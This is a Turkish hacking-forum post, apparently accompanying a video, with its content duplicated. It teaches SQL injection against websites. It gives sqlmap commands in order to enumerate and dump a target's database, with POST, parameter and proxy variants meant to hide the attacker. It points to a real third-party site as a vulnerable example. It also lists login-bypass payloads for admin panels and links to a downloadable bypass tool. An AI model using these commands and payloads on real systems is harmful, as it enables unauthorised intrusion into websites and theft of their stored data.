Video:
SQLMAP İNDİR:
Linux:
-UBUNTU&Kali vb.. Ve Dağıtımlar; sudo apt-get install sqlmap
-Fux & Fedora vb..; dnf install sqlmap
-Arch: pacman install sqlmap
-VB; yum install sqlmap
Windows:
Pythonu İndirip CMD pythonun olduğu konumda İle Şu Komutu Çalıştırın:
sqlmap.py site.com --dbs
Gerisi Videodaki gibi olcak
Github; https://github.com/sqlmapproject/sqlmap
İyi Seyirler..
SQLMAP KULLANIMI(Komutlar Mysql Dump);
Sırasyla:
1)
sqlmap -u http://www.hedefsite.com/index.php?id=1 --dbs
2)
sqlmap -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı --tables
3)
sqlmap -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı --columns
4)
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı -C kolonadı --dump
----------------------------------------------------------------------------------------------
Tamam da SQL sadece GET parametresi ile mi olmak zorunda ? POST parametreli bir sql arıyorsak ne yapmalıyız diyorsanız;
sqlmap -u "http://www.ornek.com/index.php?id=2" --data="Post verisi" --dbms
sqlmap -u "http://www.ornek.com/index.php?id=2" --data="adi=merdincz&domain=merdincz.com" --dbms
Peki tüm parametreleri taraması yerine, sadece benim belirttiğim parametrede sql denemesini nasıl sağlatabiliriz ?
sqlmap -u "http://www.ornek.com/index.php?id=2¶metre=2" -p "parametre" -dbms
veya
sqlmap -u "http://www.ornek.com/index.php?id=2¶metre=2*" -dbms
Tamam peki hepsi iyi güzel de, ip işi için ne yapıcaz ? Proxy desteği var mıdır derseniz;
sqlmap -u "http://www.ornek.com/index.php?id=2" -dbms --proxy="IP
ort" --proxy-cred="KulAdi:Sifre"
Yaptığı tüm işlemleri sql sorgularını, cevaplarını nasıl görebilirim diyorsanız;
sqlmap -u "http://www.ornek.com/index.php?id=2" -dbms -t /usr/share/log.txt
SQL AÇIK OLDUĞUNU NASIL ANLARIZ?;
Örnek Site; http://www.romanianwriters.ro/s.php?id=1
Sonuna = ' veya %27 Eklediğimizde Böyle(VB.) Bir Hata Verirse;
(Sql Açık Var Demektir)
"Sql Injection Login Bypass" Nedir ?
Girilen Zararlı Karakterlerin Filtrelenmemesinden Dolayı Kaynaklanan Açıktır.Aynı Sql Injectiondaki Gibi Veri Tabanından Bilgi Çekmek İçin Kullanılan Komutlar İle Siteye Giriş Yapılır.Buradaki Amaç Komutları Username ve Password Kısmına Yazarak Siteye Giriş Yapmaktır.
"Sql Injection Login Bypass" Nasıl Uygulanır ?
Örnek Olarak Bir Sitenin Admin Paneline Girdiğimizi Varsayıyorum.Bir User ve Pass İsteyen İnput Bölümü Var.Şimdi Komutları Kullanarak Girmeyi Deneyelim.
User ve Pass Kısmına
User: 'or'
Pass: 'or'
Diğer Bypass Komutları;
1’or’1’=’1
‘ or 1=1 –
1’or’1’=’1
admin’–
admin'--
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”)
---------------------------------------------
OTOMATİK LOGİN Bypass Toolu( Bunuda Eklemiş Olayım ) ;
İNDİR;
https://yadi.sk/d/TLdEiilMmmY3n
VirüsTOTAL: https://www.virustotal.com/tr/file/...7bc8d4bdb03641c0e15026ab/analysis/1452378670/
---------------------------------------------
İyi Hackler [Videoma Like Atmayı Unutmayın ]
[ Kirito1337 Farkıyla ]
(Yorum Yaptıktan Sonra Konuyu Tam Olarak Görebilirsiniz)
Linux:
-UBUNTU&Kali vb.. Ve Dağıtımlar; sudo apt-get install sqlmap
-Fux & Fedora vb..; dnf install sqlmap
-Arch: pacman install sqlmap
-VB; yum install sqlmap
Windows:
Pythonu İndirip CMD pythonun olduğu konumda İle Şu Komutu Çalıştırın:
View hidden content is available for registered users!
sqlmap.py site.com --dbs
Gerisi Videodaki gibi olcak
Github; https://github.com/sqlmapproject/sqlmap
İyi Seyirler..
SQLMAP KULLANIMI(Komutlar Mysql Dump);
Sırasyla:
1)
sqlmap -u http://www.hedefsite.com/index.php?id=1 --dbs
2)
sqlmap -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı --tables
3)
sqlmap -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı --columns
4)
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı -C kolonadı --dump
----------------------------------------------------------------------------------------------
Tamam da SQL sadece GET parametresi ile mi olmak zorunda ? POST parametreli bir sql arıyorsak ne yapmalıyız diyorsanız;
sqlmap -u "http://www.ornek.com/index.php?id=2" --data="Post verisi" --dbms
sqlmap -u "http://www.ornek.com/index.php?id=2" --data="adi=merdincz&domain=merdincz.com" --dbms
Peki tüm parametreleri taraması yerine, sadece benim belirttiğim parametrede sql denemesini nasıl sağlatabiliriz ?
sqlmap -u "http://www.ornek.com/index.php?id=2¶metre=2" -p "parametre" -dbms
veya
sqlmap -u "http://www.ornek.com/index.php?id=2¶metre=2*" -dbms
Tamam peki hepsi iyi güzel de, ip işi için ne yapıcaz ? Proxy desteği var mıdır derseniz;
sqlmap -u "http://www.ornek.com/index.php?id=2" -dbms --proxy="IP
ort" --proxy-cred="KulAdi:Sifre"Yaptığı tüm işlemleri sql sorgularını, cevaplarını nasıl görebilirim diyorsanız;
sqlmap -u "http://www.ornek.com/index.php?id=2" -dbms -t /usr/share/log.txt
SQL AÇIK OLDUĞUNU NASIL ANLARIZ?;
Örnek Site; http://www.romanianwriters.ro/s.php?id=1
Sonuna = ' veya %27 Eklediğimizde Böyle(VB.) Bir Hata Verirse;
(Sql Açık Var Demektir
)"Sql Injection Login Bypass" Nedir ?
Girilen Zararlı Karakterlerin Filtrelenmemesinden Dolayı Kaynaklanan Açıktır.Aynı Sql Injectiondaki Gibi Veri Tabanından Bilgi Çekmek İçin Kullanılan Komutlar İle Siteye Giriş Yapılır.Buradaki Amaç Komutları Username ve Password Kısmına Yazarak Siteye Giriş Yapmaktır.
"Sql Injection Login Bypass" Nasıl Uygulanır ?
Örnek Olarak Bir Sitenin Admin Paneline Girdiğimizi Varsayıyorum.Bir User ve Pass İsteyen İnput Bölümü Var.Şimdi Komutları Kullanarak Girmeyi Deneyelim.
User ve Pass Kısmına
User: 'or'
Pass: 'or'
Diğer Bypass Komutları;
View hidden content is available for registered users!
1’or’1’=’1
‘ or 1=1 –
1’or’1’=’1
admin’–
admin'--
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”)
---------------------------------------------
OTOMATİK LOGİN Bypass Toolu( Bunuda Eklemiş Olayım
) ;İNDİR;
View hidden content is available for registered users!
https://yadi.sk/d/TLdEiilMmmY3n
VirüsTOTAL: https://www.virustotal.com/tr/file/...7bc8d4bdb03641c0e15026ab/analysis/1452378670/
---------------------------------------------
İyi Hackler
[Videoma Like Atmayı Unutmayın ][ Kirito1337 Farkıyla
](Yorum Yaptıktan Sonra Konuyu Tam Olarak Görebilirsiniz)
